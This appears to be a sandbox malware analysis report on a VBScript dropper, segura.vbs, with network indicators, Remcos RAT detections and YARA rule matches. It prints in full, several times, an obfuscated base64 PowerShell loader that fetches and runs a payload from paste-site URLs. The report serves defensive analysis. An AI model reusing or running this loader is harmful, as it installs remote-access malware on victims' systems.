            Source: powershell.exe, 00000004.00000002.2307658874.000002304F938000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/J6uRjZrv
            Source: powershell.exe, 00000004.00000002.2309229890.0000023053104000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2309229890.000002305196F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2217928363.0000020D016B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.org
            Source: powershell.exe, 00000004.00000002.2309229890.0000023053104000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2309229890.000002305196F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2309229890.00000230530E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.org/shqm6g9p/raw
            Source: powershell.exe, 00000004.00000002.2309229890.0000023053104000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.org/shqm6g9p/rawP
            Source: powershell.exe, 00000007.00000002.2217928363.0000020D01471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2217928363.0000020D016B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2217928363.0000020D00C2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.org/vsm4ofxs/raw
            Source: powershell.exe, 00000007.00000002.2217928363.0000020D01471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.org/vsm4ofxs/rawp
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.6:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.6:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.6:49744 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.6:49756 version: TLS 1.2
            Source: Yara matchFile source: 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3460, type: MEMORYSTR

            E-Banking Fraud

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3460, type: MEMORYSTR

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 4.2.powershell.exe.2305184b690.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste Author: ditekSHen
            Source: 4.2.powershell.exe.2305184b690.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
            Source: 4.2.powershell.exe.23052ec24b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste Author: ditekSHen
            Source: 4.2.powershell.exe.23052ec24b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
            Source: 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 4952, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 3460, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 3460, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bo?HY?ZQB3?G0?I??9?C??Jw?w?Cc?I??7?CQ?ZwBy?Hg?cwB0?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?Gc?YwBi?Gg?a??g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?ZwBj?GI?a?Bo?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?m?DQ?MgBk?GI?YgBk?GU?YgBl?DU?NwBj?GI?NwBk?GQ?YQBk?DQ?ZQ?4?GI?O??x?Dg?ZQ?1?Dc?YQBj?Dk?OQ?5?Dg?OQBm?GM?MgBi?Dk?Yg?2?DM?OQ?x?GE?NQ?1?GI?M?Bi?DI?Z?Bm?GQ?ZQ?4?GU?Z?Bk?GQ?NQBl?DE?PQBt?Gg?JgBh?GU?M??z?DI?Mg?3?DY?PQBz?Gk?JgBh?DY?Mg?4?DM?Mg?3?DY?PQB4?GU?PwB0?Hg?d??u?DI?ZQB0?HM?ZQ?v?DM?MQ?x?Dc?M??4?DY?N??0?DI?Mg?x?D??Ng?z?Dk?OQ?y?DE?Lw?x?DI?Nw?4?DU?O??3?DI?NQ?4?Dk?M??x?Dg?Mw?3?Dg?MQ?x?C8?cwB0?G4?ZQBt?Gg?YwBh?HQ?d?Bh?C8?bQBv?GM?LgBw?H??YQBk?HI?bwBj?HM?aQBk?C4?bgBk?GM?Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bn?HI?e?Bz?HQ?I??s?C??JwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Gg?dgBl?Hc?bQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.r
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bo?HY?ZQB3?G0?I??9?C??Jw?w?Cc?I??7?CQ?ZwBy?Hg?cwB0?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?Gc?YwBi?Gg?a??g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?ZwBj?GI?a?Bo?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?m?DQ?MgBk?GI?YgBk?GU?YgBl?DU?NwBj?GI?NwBk?GQ?YQBk?DQ?ZQ?4?GI?O??x?Dg?ZQ?1?Dc?YQBj?Dk?OQ?5?Dg?OQBm?GM?MgBi?Dk?Yg?2?DM?OQ?x?GE?NQ?1?GI?M?Bi?DI?Z?Bm?GQ?ZQ?4?GU?Z?Bk?GQ?NQBl?DE?PQBt?Gg?JgBh?GU?M??z?DI?Mg?3?DY?PQBz?Gk?JgBh?DY?Mg?4?DM?Mg?3?DY?PQB4?GU?PwB0?Hg?d??u?DI?ZQB0?HM?ZQ?v?DM?MQ?x?Dc?M??4?DY?N??0?DI?Mg?x?D??Ng?z?Dk?OQ?y?DE?Lw?x?DI?Nw?4?DU?O??3?DI?NQ?4?Dk?M??x?Dg?Mw?3?Dg?MQ?x?C8?cwB0?G4?ZQBt?Gg?YwBh?HQ?d?Bh?C8?bQBv?GM?LgBw?H??YQBk?HI?bwBj?HM?aQBk?C4?bgBk?GM?Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bn?HI?e?Bz?HQ?I??s?C??JwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Gg?dgBl?Hc?bQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.rJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD342D25EF2_2_00007FFD342D25EF
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD342D40E04_2_00007FFD342D40E0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD342C25FA4_2_00007FFD342C25FA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD342C465D4_2_00007FFD342C465D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD342C32F34_2_00007FFD342C32F3
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD3439115D4_2_00007FFD3439115D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD3439243D4_2_00007FFD3439243D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD342D3A5D7_2_00007FFD342D3A5D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD342D25B27_2_00007FFD342D25B2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD342D3C2D7_2_00007FFD342D3C2D
            Source: segura.vbsInitial sample: Strings found which are bigger than 50
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3033
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3033Jump to behavior
            Source: 4.2.powershell.exe.2305184b690.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
            Source: 4.2.powershell.exe.2305184b690.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
            Source: 4.2.powershell.exe.23052ec24b8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
            Source: 4.2.powershell.exe.23052ec24b8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
            Source: 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 4952, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 3460, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 3460, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: 4.2.powershell.exe.23069e50000.3.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
            Source: 4.2.powershell.exe.23069e50000.3.raw.unpack, au.csCryptographic APIs: 'CreateDecryptor'
            Source: 4.2.powershell.exe.23052ec24b8.1.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
            Source: 4.2.powershell.exe.23052ec24b8.1.raw.unpack, au.csCryptographic APIs: 'CreateDecryptor'
            Source: 4.2.powershell.exe.23069e90000.4.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
            Source: 4.2.powershell.exe.23069e90000.4.raw.unpack, au.csCryptographic APIs: 'CreateDecryptor'
            Source: 4.2.powershell.exe.230519f7dc0.0.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
            Source: 4.2.powershell.exe.230519f7dc0.0.raw.unpack, au.csCryptographic APIs: 'CreateDecryptor'
            Source: 4.2.powershell.exe.2305184b690.2.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
            Source: 4.2.powershell.exe.2305184b690.2.raw.unpack, au.csCryptographic APIs: 'CreateDecryptor'
            Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@22/9@3/4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tcnnvqu5.vne.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\segura.vbs"
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\segura.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bo?HY?ZQB3?G0?I??9?C??Jw?w?Cc?I??7?CQ?ZwBy?Hg?cwB0?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?Gc?YwBi?Gg?a??g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?ZwBj?GI?a?Bo?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?m?DQ?MgBk?GI?YgBk?GU?YgBl?DU?NwBj?GI?NwBk?GQ?YQBk?DQ?ZQ?4?GI?O??x?Dg?ZQ?1?Dc?YQBj?Dk?OQ?5?Dg?OQBm?GM?MgBi?Dk?Yg?2?DM?OQ?x?GE?NQ?1?GI?M?Bi?DI?Z?Bm?GQ?ZQ?4?GU?Z?Bk?GQ?NQBl?DE?PQBt?Gg?JgBh?GU?M??z?DI?Mg?3?DY?PQBz?Gk?JgBh?DY?Mg?4?DM?Mg?3?DY?PQB4?GU?PwB0?Hg?d??u?DI?ZQB0?HM?ZQ?v?DM?MQ?x?Dc?M??4?DY?N??0?DI?Mg?x?D??Ng?z?Dk?OQ?y?DE?Lw?x?DI?Nw?4?DU?O??3?DI?NQ?4?Dk?M??x?Dg?Mw?3?Dg?MQ?x?C8?cwB0?G4?ZQBt?Gg?YwBh?HQ?d?Bh?C8?bQBv?GM?LgBw?H??YQBk?HI?bwBj?HM?aQBk?C4?bgBk?GM?Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bn?HI?e?Bz?HQ?I??s?C??JwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Gg?dgBl?Hc?bQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.r
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
